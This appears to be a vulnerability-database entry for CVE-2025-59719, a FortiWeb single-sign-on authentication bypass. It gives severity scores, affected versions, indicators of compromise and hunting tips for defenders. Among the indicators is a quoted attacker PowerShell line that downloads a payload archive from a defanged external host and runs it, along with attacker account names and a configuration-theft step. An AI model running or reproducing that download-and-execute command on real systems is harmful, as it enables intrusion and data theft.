cbcvebase.
CVE-2025-59719
published 2025-12-09

CVE-2025-59719: An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
23.67%
97.5th percentile
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.

Affected

9 ranges
VendorProductVersion rangeFixed in
fortinetforticloud
fortinetfortinet
fortinetfortios
fortinetfortiproxy
fortinetfortiswitchmanager
fortinetfortiweb
fortinetfortiweb
fortinetfortiweb7.4.0 – 7.4.9
fortinetfortiweb7.6.0 – 7.6.4

Detection & IOCsextracted from sources · hover to see the quote

ip104.28.244.115
ip104.28.212.114
ip37.1.209.19
ip217.119.139.50
ip104.28.244.114
ip193.24.211.61
ip185.156.73.62
ip185.242.246.127
ip172.67.196.232
otheraudit
otherbackup
otheritadmin
othersecadmin
othersupport
urlhxxps://storage.googleapis[.]com/apply-main/windows_agent_x64[.]msi
urlhxxps://fastdlvrss[.]s3[.]us-east-1[.]amazonaws[.]com/paswr.zip
domainfastdlvrss.s3.us-east-1.amazonaws.com
domainndibstersoft.com
domainneremedysoft.com
pathC:\ProgramData\USOShared
filenameSysdmupd.zip
filenamejava.exe
commandshow full-configuration
commandInvoke-WebRequest -Uri 'hxxps://fastdlvrss[.]s3[.]us-east-1[.]amazonaws[.]com/paswr.zip' -OutFile 'C:\programdata\usoshared\Sysdmupd.zip'; Expand-Archive -Path 'C:\programdata\usoshared\Sysdmupd.zip' -DestinationPath 'c:\programdata\usoshared\' -Force; Remove-Item 'C:\programdata\usoshared\Sysdmupd.zip'; cmd /c 'c:\programdata\usoshared\java.exe';
otherWIN-X8WRBOSK0OF
otherWIN-YRSXLEONJY2
otherWIN-1J7L3SQSTMS
  • Look for FortiGate event log logid='0100044547' showing local admin account creation (e.g., 'secadmin') by [email protected] — indicates post-exploitation persistence.
  • Exploitation is only possible when FortiCloud SSO is enabled; check for 'admin-forticloud-sso-login' setting. The feature activates automatically when devices are registered via FortiCare UI.
  • After SSO authentication, attackers download full device configuration using 'show full-configuration' — monitor for this command in FortiGate CLI/audit logs.
  • Attacks are highly automated — exploitation and config exfiltration occur within seconds of initial access. Correlate rapid sequential events: SSO login → admin account creation → config download.
  • Monitor for creation of local admin accounts named 'audit', 'backup', 'itadmin', 'secadmin', or 'support' on FortiGate devices — these are attacker-created persistence accounts.
  • Attacker-controlled rogue workstations joined to AD domain — hunt for unexpected machine account creation, especially names WIN-X8WRBOSK0OF, WIN-YRSXLEONJY2, WIN-1J7L3SQSTMS.
  • Monitor for a FortiGate process named 'fortidcagent' being abused or unusual activity associated with it during post-exploitation lateral movement.
  • Attacker used 'ssl-admin' VPN account for post-exploitation access — audit VPN user accounts for unexpected entries like 'ssl-admin'.
  • Shadowserver is tracking ~11,000 internet-exposed Fortinet devices with FortiCloud SSO enabled — use Shadowserver data to identify exposed assets in your network.
  • ·CVE-2025-59719 only affects FortiWeb; it is NOT exploitable unless FortiCloud SSO is enabled. FortiCloud SSO is not enabled by default but activates automatically when devices are registered via the FortiCare UI.
  • ·Third-party SAML IdPs and FortiAuthenticator are NOT impacted by this issue — only FortiCloud SSO is affected.
  • ·The initial patch (FortiOS 7.4.9) did not fully address the authentication bypass; a patch bypass was observed in the wild against fully patched devices. FortiOS 7.4.11, 7.6.6, and 8.0.0 were planned to fully remediate.
  • ·Attacker SSO login accounts ([email protected], [email protected]) and observed IP addresses may change as Fortinet takes action to neutralize them.
  • ·Affected FortiWeb versions: 8.0.0, 7.6.0–7.6.4, 7.4.0–7.4.9. FortiWeb 7.0 and 7.2 are NOT affected by CVE-2025-59719.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.